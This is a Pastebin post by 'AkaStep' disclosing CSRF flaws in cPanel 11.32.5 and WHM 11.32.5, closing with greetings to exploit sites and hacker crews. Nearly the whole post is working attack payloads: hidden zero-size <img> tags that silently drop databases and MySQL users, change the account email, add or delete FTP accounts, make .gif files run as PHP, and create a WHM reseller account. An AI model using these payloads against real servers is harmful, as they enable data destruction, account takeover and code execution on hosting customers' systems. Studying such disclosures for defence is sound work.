Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ==============================================================================
- Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
- Vulnerability: CSRF
- Vendor: cpanel.net
- ==============================================================================
- =====================================================================
- Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
- Aka: Cpanel Accelerated 2
- via
- WHM 11.32.5 (build 11)
- =====================================================================
- CSRF: Drop Database: (Method $_GET)
- <img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" width="0" />
- Here we are going to drop database named: armenian_music
- =====================================================================
- CSRF: Drop mysql user: (Method $_GET)
- <img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" />
- Here we are going to drop mysql user named: armenian_adserver ))
- =====================================================================
- CSRF: Change email address: (Contact Information & Preferences) (Method $_GET)
- Changing email address to: owned_and_owned_again@gmail.tld
- <img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail.tld&second_email=¬ify_disk_limit=1¬ify_bandwidth_limit=1¬ify_email_quota_limit=1" heigth="0" width="0" />
- =====================================================================
- CSRF adding FTP account:
- username: akastep
- password: akastep
- host is target host.
- <img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/"a=0&cache_fix=owned_by_akastep" heigth="0" width="0" />
- =====================================================================
- CSRF Drop FTP account:
- Deletes existent ftp account named: axaxa
- <img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" />
- =====================================================================
- CSRF change Apache handler:
- (Parse .gif file as php script)
- <img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" heigth="0" width="0" />
- =====================================================================
- CSRF Delete handler:
- <img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" width="0" />
- =====================================================================
- WHM 11.32.5 (build 11)
- CSRF: Add Reseller+setup
- with domain: owned.com
- username: owned111
- password: MYVERYSTRONGGOESHERE
- And contact email: owned@owned1.you
- <img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com&username=owned111&password=MYVERYSTRONGGOESHERE&contactemail=owned%40owned1.you&dbuser=owned&msel=n%2Cy%2C1%2Cn%2Cx3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2C0%2C0%2Cdefault%2Cen%2C%2C%2CReseller+setup&pkgname=&featurelist=default"a=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" width="0" />
- =====================================================================
- ================================================
- SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
- ================================================
- packetstormsecurity.org
- packetstormsecurity.com
- packetstormsecurity.net
- securityfocus.com
- cxsecurity.com
- security.nnov.ru
- securtiyvulns.com
- securitylab.ru
- secunia.com
- securityhome.eu
- exploitsdownload.com
- exploit-db.com
- osvdb.com
- websecurity.com.ua
- to all Aa Team + to all Azerbaijan Black HatZ +
- *Especially to my bro CAMOUFL4G3 *
- Also special thanks to: ottoman38 & HERO_AZE
- ================================================
- /AkaStep
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement